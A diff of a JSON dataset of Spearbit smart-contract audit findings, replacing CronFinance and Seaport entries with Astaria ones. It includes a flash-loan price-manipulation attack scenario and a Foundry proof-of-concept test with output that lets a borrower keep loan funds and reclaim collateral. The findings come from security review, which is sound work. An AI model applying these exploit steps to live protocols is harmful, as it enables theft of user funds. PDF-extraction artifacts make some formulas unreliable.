"https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "A number of minor inaccuracies were discovered in comments that could impact the comprehensi- bility of the code to future maintainers, integrators, and extenders. [1] bit-0 should be bit-1 [2] less than should be at most [3] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [4] Maximally Extracted Value should be Maximal Extractable Value see flashbots.net [5] on these lines unsold should be sold [6] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop 19 on line 54. [7] These comments are not applicable to the code block below them, as they mention looping but no looping is done; it seems they were copied over from the loop on line 111. [8] omitted should be emitted", + "title": "UNI_V3Validator fetches spot prices that may lead to price manipulation attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "UNI_V3Validator.validateAndParse() checks the state of the Uniswap V3 position. This includes checking the LP value through LiquidityAmounts.getAmountsForLiquidity. //get pool state //get slot 0 (uint160 poolSQ96, , , , , , ) = IUniswapV3PoolState( V3_FACTORY.getPool(token0, token1, fee) ).slot0(); (uint256 amount0, uint256 amount1) = LiquidityAmounts .getAmountsForLiquidity( poolSQ96, TickMath.getSqrtRatioAtTick(tickLower), TickMath.getSqrtRatioAtTick(tickUpper), liquidity ); LiquidityAmounts.sol#L177-L221 When we deep dive into getAmountsForLiquidity, we see three cases. Price is below the range, price is within the range, and price is above the range. 28 function getAmountsForLiquidity( uint160 sqrtRatioX96, uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount0, uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); if (sqrtRatioX96 <= sqrtRatioAX96) { amount0 = getAmount0ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } else if (sqrtRatioX96 < sqrtRatioBX96) { amount0 = getAmount0ForLiquidity( sqrtRatioX96, sqrtRatioBX96, liquidity ); amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioX96, liquidity ); } else { amount1 = getAmount1ForLiquidity( sqrtRatioAX96, sqrtRatioBX96, liquidity ); } } } For simplicity, we can break into getAmount1ForLiquidity 29 /// @notice Computes the amount of token1 for a given amount of liquidity and a price range /// @param sqrtRatioAX96 A sqrt price representing the first tick boundary /// @param sqrtRatioBX96 A sqrt price representing the second tick boundary /// @param liquidity The liquidity being valued /// @return amount1 The amount of token1 function getAmount1ForLiquidity( uint160 sqrtRatioAX96, uint160 sqrtRatioBX96, uint128 liquidity ) internal pure returns (uint256 amount1) { unchecked { if (sqrtRatioAX96 > sqrtRatioBX96) (sqrtRatioAX96, sqrtRatioBX96) = (sqrtRatioBX96, sqrtRatioAX96); return FullMathUniswap.mulDiv( liquidity, sqrtRatioBX96 - sqrtRatioAX96, FixedPoint96.Q96 ); } } is calculated as amount = liquidity * (upper price - lower price). When the We find the amount slot0.poolSQ96 is in lp range, the lower price is the slot0.poolSQ96, the closer slot0 is to lowerTick, the smaller the amount1 is. This is vulnerable to price manipulation attacks as IUniswapV3PoolState.slot0.poolSQ96 is effectively the spot price. Attackers can acquire huge funds through flash loans and shift theslot0 by doing large swaps on Uniswap. Assume the following scenario, the strategist sign a lien that allows the borrower to provide ETH-USDC position with > 1,000,000 USDC and borrow 1,000,000 USDC from the vault. Attacker can first provides 1 ETH worth of lp at price range 2,000,000 ~ 2,000,001. The attacker borrows flash loan to manipulate the price of the pool and now the slot0.poolSQ96 = sqrt(2,000,000). (ignoring the decimals difference. getAmountsForLiquidity value the LP positions with the spot price, and find the LP has 1 * 2,000,000 USDC in the position. The attacker borrows 2,000,000 Restoring the price of Uniswap pool and take the profit to repay the flash loan. Note that the project team has stated clearly that UNI_V3Validator will not be used before the audit. This issue is filed to provide information to the codebase.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The Balancer protocol utilizes two types of swaps for its functionality - GIVEN_IN and GIVEN_OUT. GIVEN_IN specifies the minimum amount of tokens a user would accept to receive from the swap. GIVEN_OUT specifies the maximum amount of tokens a user would accept to send for the swap. However, the onSwap function of the CronV1Pool contract only accepts the IVault.SwapKind.GIVEN_IN value as the IVault.SwapKind field of the SwapRequest struct. The unsupported SwapKind.GIVEN_OUT may limit the compatibility with Balancer on the Batch Swaps and the Smart Order Router functionality, as a single SwapKind is given as an argument.", + "title": "Users pay protocol fee for interests they do not get", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The PublicVault._handleStrategistInterestReward() function currently charges a protocol fee from minting vault shares, affecting all vault LP participants. However, not every user receives interest payments. Consequently, a scenario may arise where a user deposits funds into the PublicVault before a loan is repaid, resulting in the user paying more in protocol fees than the interest earned. This approach appears to be unfair to certain users, leading to a disproportionate fee structure for those who do not benefit from the interest rewards.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "A pool's first LP will always take a minor loss on the value of their liquidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The first liquidity provider for a pool will always take a small loss on the value of their tokens deposited into the pool because 1000 balancer pool tokens are minted to the zero address on the initial deposit. As most tokens have 18 decimal places, this value would be negligible in most cases, however, for tokens with a high value and small decimals the effects may be more apparent.", + "title": "Seaport auctions not compatible with USDT", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "As per ERC20 specification, approve() returns a boolean function approve(address _spender, uint256 _value) public returns (bool success) However, USDT deviates from this standard and it's approve() method doesn't have a return value. Hence, if USDT is used as a payment token, the following line reverts in validateOrder() as it expects return data but doesn't receive it: paymentToken.approve(address(transferProxy), s.LIEN_TOKEN.getOwed(stack));", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The _withdrawCronFees functions should revert if no fees to withdraw", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/CronFinance-Spearbit-Security-Review.pdf", - "body": "The _withdrawCronFees checks if there are any Cron Fees that need to be withdrawn, currently, this function does not revert in case there are no fees.", + "title": "Borrowers cannot provide slippage protection parameters when committing to a lien", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a borrower commits to a lien, AstariaRouter calls the strategy validator to fetch the lien details (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( strategyValidator ).validateAndParse( commitment.lienRequest, msg.sender, commitment.tokenContract, commitment.tokenId ); details include rate, duration, liquidationInitialAsk: struct Details { uint256 maxAmount; uint256 rate; //rate per second uint256 duration; uint256 maxPotentialDebt; // not used anymore uint256 liquidationInitialAsk; } The borrower cannot provide slippage protection parameters to make sure these 3 values cannot enter into some undesired ranges.", "labels": [ "Spearbit", - "CronFinance", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The spent offer amounts provided to OrderFulfilled for collection of (advanced) orders is not the actual amount spent in general", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, the OrderFulfilled is called before applying fulfillments and executing transfers. The offer and consideration items have the following forms: C = (It , T , i, acurr , R, acurr ) O = (It , T , i, acurr , acurr ) Where parameter description It T i acurr R O C itemType token identifier the interpolation of startAmount and endAmount depending on the time and the fraction of the order. consideration item's recipient offer item. consideration item. The SpentItems and ReceivedItem items provided to OrderFulfilled event ignore the last component of the offer/consideration items in the above form since they are redundant. Seaport enforces that all consideration items are used. But for the endpoints in this context, we might end up with offer items with only a portion of their amounts being spent. So in the end O.acurr might not be the amount spent for this offer item, but OrderFulfilled emits O.acurr as the amount spent. This can cause discrepancies in off-chain bookkeeping by agents listening for this event. The fulfillOrder and fulfillAdvancedOrder do not have this issue, since all items are enforced to be used. These two endpoints also differ from when there are collections of (advanced) orders, in that they would emit the OrderFulfilled at the of their call before clearing the reentrancy guard.", + "title": "The liquidation's auction starting price is not chosen perfectly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a lien is expired and liquidated the starting price for its Seaport auction is chosen as stack.lien.details.liquidationInitialAs. It would make more sense to have the startingPrice to be the maximum of the amount owed up to now and the stack.lien.details.liquidationInitialAsk ps = max(Lin, aowed ) For example if the liquidate(...) endpoint is called way after the lien's expiration time the amount owed might be bigger than the stack.lien.details.liquidationInitialAsk. When a lien is created the protocol checks that stack.lien.details.liquidationInitialAsk is not smaller than the to-be-owed amount at the end of the lien's term. But the lien can keep accruing interest if it is not liquidated right away when it gets expired.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport is called to fulfill or match a collection of (advanced) orders, there are scenarios where not all offer items will be used. When not all the current amount of an offer item is used and if this offer item belongs to an order which is of either CONTRACT order type or it is restricted order (and the caller is not the zone), then the spent amount shared with either the contract offerer or zone through their respective endpoints (validateOrder for zones and ratifyOrder for contract offerers) does not reflect the actual amount spent. When Seaport is called through one of its more complex endpoints to match or fulfill orders, the offer items go through a few phases: parameter description It T i as ae acurr O itemType token identifier startAmount endAmount the interpolation of startAmount and endAmount depending on the time and the fraction of the order. offer item. Let's assume an offer item is originally O = (It , T , i, as, ae) In _validateOrdersAndPrepareToFulfill, O gets transformed into (It , T , i, acurr , acurr ) Then depending on whether the order is part of a match (1, 2. 3) or fulfillment (1, 2) order and there is a corresponding fulfillment data pointing at this offer item, it might transform into (It , T , i, b, acurr ) where b 2 [0, 1). For fulfilling a collection of orders b 2 {0, acurr } depending on whether the offer item gets used or not, but for match orders, it can be in the more general range of b 2 [0, 1). And finally for restricted or CONTRACT order types before calling _assertRestrictedAdvancedOrderValidity, the offer item would be transformed into (It , T , i, acurr , acurr ). So the startAmount of an offer item goes through the following flow: as ! acurr ! b 2 [0, 1) ! acurr 7 And at the end acurr is the amount used when Seaport calls into the validateOrder of a zone or ratifyOrder of a contract offerer. acurr does not reflect the actual amount that this offer item has contributed to a combined amount used for an execution transfer.", + "title": "Canceled Seaport auctions can still be claimed by the liquidator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Canceled auctions can still be claimed by the liquidator if ( s.idToUnderlying[collateralId].auctionHash != s.SEAPORT.getOrderHash(getOrderComponents(params, counterAtLiquidation)) ) { //revert auction params don't match revert InvalidCollateralState( InvalidCollateralStates.INVALID_AUCTION_PARAMS ); } If in the future we would add an authorised endpoint that could call s.SEAPORT.incrementCounter() to cancel all outstanding NFT auctions, the liquidator can call this endpoint liquidatorNFTClaim(..., counterAtLiq- uidation) where counterAtLiquidation is the old counter to claim its NFT after the canceled Seaport auction ends.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Empty criteriaResolvers for criteria-based contract orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There is a deviation in how criteria-based items are resolved for contract orders. For contract orders which have offers with criteria, the _compareItems function checks that the contract offerer returned a corresponding non-criteria based itemType when identifierOrCriteria for the original item is 0, i.e., offering from an entire collection. Afterwards, the orderParameters.offer array is replaced by the offer array returned by the contract offerer. For other criteria-based orders such as offers with identifierOrCriteria = 0, the itemType of the order is only updated during the criteria resolution step. This means that for such offers there should be a corresponding CriteriaResolver struct. See the following test: 8 modified @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { test/advanced.spec.ts // Seller approves marketplace contract to transfer NFTs await set1155ApprovalForAll(seller, marketplaceContract.address, true); - - + const { root, proofs } = merkleTree([nftId]); const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))]; const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))]; const consideration = [ getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address), @@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address), ]; + - + // Replacing by `const criteriaResolvers = []` will revert const criteriaResolvers = [ buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]), buildResolver(0, 0, 0, nftId, []), ]; const { order, orderHash, value } = await createOrder( However, in case of contract offers with identifierOrCriteria = 0, Seaport 1.2 does not expect a corresponding CriteriaResolver struct and will revert if one is provided as the itemType was updated to be the corresponding non-criteria based itemType. See advanced.spec.ts#L510 for a test case. Note: this also means that the fulfiller cannot explicitly provide the identifier when a contract order is being fulfilled. A malicious contract may use this to their advantage. For example, assume that a contract offerer in Seaport only accepts criteria-based offers. The fulfiller may first call previewOrder where the criteria is always resolved to a rare NFT, but the actual execution would return an uninteresting NFT. If such offers also required a corresponding resolver (similar behaviour as regular criteria based orders), then this could be fixed by explicitly providing the identifier--akin to a slippage check. In short, for regular criteria-based orders with identifierOrCriteria = 0 the fulfiller can pick which identifier to receive by providing a CriteriaResolver (as long as it's valid). For contract orders, fulfillers don't have this option and contracts may be able to abuse this.", + "title": "The risk of bad debt is transferred to the non-redeeming shareholders and not the redeeming holders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Right before a successful epochProcess(), the total assets A equals to + P(s,tl )2U2 a(s, tl ) A = y0 + s(t (cid:0) tlast ) = B + a(s, t) X s2U1 All the parameter values in the below table are considered as just before calling the processEpoch() endpoint unless stated otherwise. A | totalAssets() | y0 | yIntercept | s | slope | tlast | lasttimestamp used to update y0 or s | t | block.timestamp | B | ERC20(asset()).balanceOf(PublicVault), underlying balance of the public vault | U1 | The set of active liens/stacks owned by the PublicVault, this can be non-empty due to how long the lien durations can be | U2 | The set of liquidated liens/stacks and their corresponding liquidation timestamp ( tl ) which are owned by the current epoch's WithdrawProxy Wecurr . These liens belong to the current epoch, but their auction ends in the next epoch duration. | a(s, t) | total amount owned by the stack s up to the timestamp t. S | totalSupply(). SW | number of shares associated with the current epoch's WithdrawProxy ,currentWithdrawProxy.totalSupply() | E | currentWithdrawProxy.getExpected(). 35 0 | yIntercept after calling epochProcess(). wr | withdrawReserve this is the value after calling epochProcess(). y 0 tp | last after calling epochProcess(). A0 | totalAssets after calling epochProcess(). Wn | the current epoch's WithdrawProxy before calling epochProcess(). Wn+1 | the current epoch's WithdrawProxy after calling epochProcess(). Also assume that claim() was already called on the previous epoch's WithdrawProxy if needed. After the call to epochProcess() (in the same block), we would have roughly (not considering the division errors) A0 = y 0 0 + s(t (cid:0) tp) A0 = (1 (cid:0) SW S )A + X s2U1 (a(s, t) (cid:0) a(s, tp)) wr = ( SW S ) B + a(s, tp) X s2U1 A = A0 + wr + ( SW S ) X (s,tl )2U2 a(s, tl ) (cid:0)(cid:1)A = wr + ( SW S )E and so: To be able to call processEpoch() again we need to make sure wr tokens have been transferred to Wn either from the public vault's assets B or from Wn+1 assets. Note that at this point wr equals to wr = SW S B + SW S X s2U1 a(s, tp) SW S B is an actual asset and can be transferred to Wn right away. The The a(s, tp) portion is a percentage of the amount owed by active liens at the time the processEpoch() was called. Depending on whether these liens get paid fully or not we would have: SW S Ps2U1 If they get fully paid there are no risks for the future shareholders to bare. If these liens are not fully paid since we have transferred a(s, tp) from the actual asset balance to Wn the redeeming shareholder would not take the risk of these liens getting liquidated for less than their value. But these risks are transferred to the upcoming shareholders or the shareholders who have not redeemed their positions yet. SW S Ps2U1", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Advance orders of CONTRACT order types can generate orders with less consideration items that would break the aggregation routine", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CON- TRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide fewer consideration items for this order. So the total number of consideration items might be less than the ones provided by the caller. But since the caller would need to provide the fulfillment data beforehand to Seaport, they might use indices that would turn to be out of range for the consideration in question after the modification applied for the contract offerer above. If this happens, the whole call will be reverted. This issue is in the same category as Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine.", + "title": "validateOrder(...) does not check the consideration amount against its token balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "When a lien position gets liquidated the CollateralToken creates a full restricted Seaport auction with itself as both the offerer and the zone. This will cause Seaport to do a callback to the CollateralToken's validateOrder(...) endpoint at the end of order fulfilment/matching. In this endpoint we have: uint256 payment = zoneParameters.consideration[0].amount; This payment amount is not validated.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT or- der type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "For most advanced order types, we have the following check: // Read numerator and denominator from memory and place on the stack. uint256 numerator = uint256(advancedOrder.numerator); uint256 denominator = uint256(advancedOrder.denominator); // Ensure that the supplied numerator and denominator are valid. if (numerator > denominator || numerator == 0) { _revertBadFraction(); } For CONTRACT order types this check is skipped. For later calculations (calculating the current amount) Seaport uses the numerator and denominator returned by _getGeneratedOrder which as a pair it's either (1, 1) or (0, 0). advancedOrder.numerator is only used to skip certain operations in some loops when it is 0: Skip applying criteria resolvers. 10 Skip aggregating the amount for executions. Skip the final validity check. Skipping the above operations would make sense. But when for an advancedOrder with CONTRACT order type _get- GeneratedOrder returns (h, 1, 1) and advancedOrder.numerator == 0, we would skip applying criteria resolvers, aggregating the amounts from offer or consideration amounts for this order and skip the final validity check that would call into the ratifyOrder endpoint of the offerer. But emiting the following OrderFulfilled will not be skipped, even though this advancedOrder will not be used. // Emit an OrderFulfilled event. _emitOrderFulfilledEvent( orderHash, orderParameters.offerer, orderParameters.zone, recipient, orderParameters.offer, orderParameters.consideration ); This can create discrepancies between what happens on chain and what off-chain agents index/record.", + "title": "If the auction window is 0, the borrower can keep the lien amount and also take back its collater- alised NFT token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "If an authorised entity would file to set the auctionWindow to 0, borrowers can keep their lien amount and also take back their collateralised NFT tokens. Below is how this type of vulnerability works. 1. A borrower takes a lien from a vault by collateralising its NFT token. 2. Borrower let the time pass so that its lien/stack position can be liquidated. 3. The borrower atomically liquidates and then calls the liquidatorNFTClaim(...) endpoint of the Collater- alToken. The timestamps are as follows: s (cid:20) t lien t lien e = t auction s = t auction e We should note that in step 3 above when the borrower liquidates its own position, the CollateralToken creates a Seaport auction by calling its validate(...) endpoint. But this endpoint does not validate the orders timestamps so even though the timestamps provided are not valid when one tries to fulfil/match the order since Seaport requires that t auction . Thus, in . So it is not possible to fulfil/match an order where t auction (cid:20) tnow < t auction = t auction e e s s 37 step 3 it is not needed to call liquidatorNFTClaim(...) immediately as the auction created cannot be fulfilled by anyone. // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol function _createUser(uint256 pk, string memory label) internal returns(address addr) { uint256 ownerPK = uint256(pk); addr = vm.addr(ownerPK); vm.label(addr, label); } function testScenario14() public { // allow flash liens - liens that can be liquidated in the same block that was committed IAstariaRouter.File[] memory files = new IAstariaRouter.File[](1); files[0] = IAstariaRouter.File( IAstariaRouter.FileType.AuctionWindow, abi.encode(uint256(0)) ); ASTARIA_ROUTER.fileBatch(files); console2.log(\"[+] set auction window to 0.\"); { } { address borrower1 = _createUser(0xb055033501, \"borrower1\"); address vaultOwner = _createUser(0xa77ac3, \"vaultOwner\"); address publicVault = _createPublicVault(vaultOwner, vaultOwner, 14 days); vm.label(publicVault, \"publicVault\"); console2.log(\"[+] public vault is created: %s\", publicVault); console2.log(\"vault start: %s\", IPublicVault(publicVault).START()); skip(14 days); _lendToVault( Lender({addr: vaultOwner, amountToLend: 10 ether}), payable(publicVault) ); TestNFT nft1 = new TestNFT(1); address tokenContract1 = address(nft1); uint256 tokenId1 = uint256(0); nft1.transferFrom(address(this), borrower1, tokenId1); vm.startPrank(borrower1); (uint256 lienId,ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: vaultOwner, strategistPK: 0xa77ac3, tokenContract: tokenContract1, tokenId: tokenId1, lienDetails: ILienToken.Details({ maxAmount: 2 ether, rate: 1e8, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 10 ether }), amount: 2 ether, 38 revertMessage: \"\" }); console2.log(\"ETH balance of the borrower: %s\", borrower1.balance); skip(1 hours); console2.log(\"[+] lien created with 0 duration. lineId: %s\", lienId); OrderParameters memory params = _liquidate(stack); console2.log(\"[+] lien liquidated by the borrower.\"); COLLATERAL_TOKEN.liquidatorNFTClaim( stack, params, COLLATERAL_TOKEN.SEAPORT().getCounter(address(COLLATERAL_TOKEN)) ); console2.log(\"[+] liquidator/borrower claimed NFT.\\n\"); vm.stopPrank(); console2.log(\"owner of the NFT token: %s\", nft1.ownerOf(tokenId1)); console2.log(\"ETH balance of the borrower: %s\", borrower1.balance); assertEq( nft1.ownerOf(tokenId1), borrower1, \"the borrower should own the NFT\" ); assertEq( borrower1.balance, 2 ether, \"borrower should still have the lien amount.\" ); } } forge t --mt testScenario14 --ffi -vvv: [+] set auction window to 0. [+] public vault is created: 0x4430c0731d87768Bf65c60340D800bb4B039e2C4 vault start: 1 ETH balance of the borrower: 2000000000000000000 [+] lien created with 0 duration. lineId: ,! [+] lien liquidated by the borrower. [+] liquidator/borrower claimed NFT. 91310819262208864484407122336131134788367087956387872647527849353935417268035 owner of the NFT token: 0xA92D072d39E6e0a584a6070a6dE8D88dfDBae2C7 ETH balance of the borrower: 2000000000000000000", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Calls to PausableZone's executeMatchAdvancedOrders and executeMatchOrders would revert if un- used native tokens would need to be returned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In match (advanced) orders, one can provide native tokens as offer and consideration items. So a PausableZone would need to provide msg.value to call the corresponding Seaport endpoints. There are a few scenarios where not all the msg.value native tokens amount provided to the Seaport marketplace will be used: 1. Rounding errors in calculating the current amount of offer or consideration items. The zone can prevent send- ing extra native tokens to Seaport by pre-calculating these values and making sure to have its transaction to be included in the specific block that these values were calculated for (this is important when the start and end amount of an item are not equal). 2. The zone (un)intentionally sends more native tokens that it is necessary to Seaport. 3. The (advanced) orders sent for matching in Seaport include order type of CONTRACT offerer order and the of- ferer contract provides different amount for at least one item that would eventually make the whole transaction not use the full amount of msg.value provided to it. In all these cases, since PausableZone does not have a receive or fallback endpoint to accept native tokens, when Seaport tries to send back the unsued native token amount the transaction may revert. PausableZone not accepting native tokens: $ export CODE=$(jq -r '.deployedBytecode' artifacts/contracts/zones/PausableZone.sol/PausableZone.json | tr -d '\\n') ,! $ evm --code $CODE --value 1 --prestate genesis.json --sender ,! 0xb4d0000000000000000000000000000000000000 --nomemory=false --debug run $ evm --input $(echo $CODE | head -c 44 - | sed -E s/0x//) disasm 6080806040526004908136101561001557600080fd 00000: PUSH1 0x80 00002: DUP1 00003: PUSH1 0x40 00005: MSTORE 00006: PUSH1 0x04 00008: SWAP1 00009: DUP2 0000a: CALLDATASIZE 0000b: LT 0000c: ISZERO 0000d: PUSH2 0x0015 00010: JUMPI 00011: PUSH1 0x00 00013: DUP1 00014: REVERT trace of evm ... --debug run error: execution reverted #### TRACE #### PUSH1 pc=00000000 gas=4700000 cost=3 DUP1 pc=00000002 gas=4699997 cost=3 12 Stack: 00000000 0x80 PUSH1 Stack: 00000000 00000001 MSTORE Stack: 00000000 00000001 00000002 PUSH1 Stack: 00000000 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 SWAP1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 DUP2 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 pc=00000003 gas=4699994 cost=3 pc=00000005 gas=4699991 cost=12 pc=00000006 gas=4699979 cost=3 0x80 0x80 0x40 0x80 0x80 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000008 gas=4699976 cost=3 0x4 0x80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000009 gas=4699973 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000010 gas=4699970 cost=2 0x4 0x80 0x4 CALLDATASIZE Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| 13 LT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 ISZERO Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH2 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 JUMPI Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 PUSH1 Stack: 00000000 00000001 Memory: 00000000 00000010 00000020 pc=00000011 gas=4699968 cost=3 0x0 0x4 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000012 gas=4699965 cost=3 0x1 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000013 gas=4699962 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000016 gas=4699959 cost=10 0x15 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000017 gas=4699949 cost=3 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 14 00000030 00000040 00000050 00 00 